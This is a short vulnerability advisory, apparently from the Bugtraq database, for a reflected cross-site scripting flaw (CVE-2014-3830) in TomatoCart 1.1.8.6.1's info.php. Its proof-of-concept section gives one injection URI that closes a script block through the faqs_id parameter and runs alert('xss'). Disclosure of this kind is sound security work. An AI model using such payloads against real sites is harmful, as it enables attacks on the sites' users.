TomatoCart 'info.php' Cross Site Scripting Vulnerability
BID:69110
Info
| Bugtraq ID: | 69110 |
| Class: | Input Validation Error |
| CVE: | CVE-2014-3830 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 06 2014 12:00AM |
| Updated: | Aug 06 2014 12:00AM |
| Credit: | Breaking technologies |
| Vulnerable: | TomatoCart TomatoCart 1.1.8.6.1 |
| Not Vulnerable: | |
Exploit / POC
Attackers can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.
The following example URI is available:
http://www.example.com/info.php?faqs&faqs_id=1';</script><script>alert('xss');</script>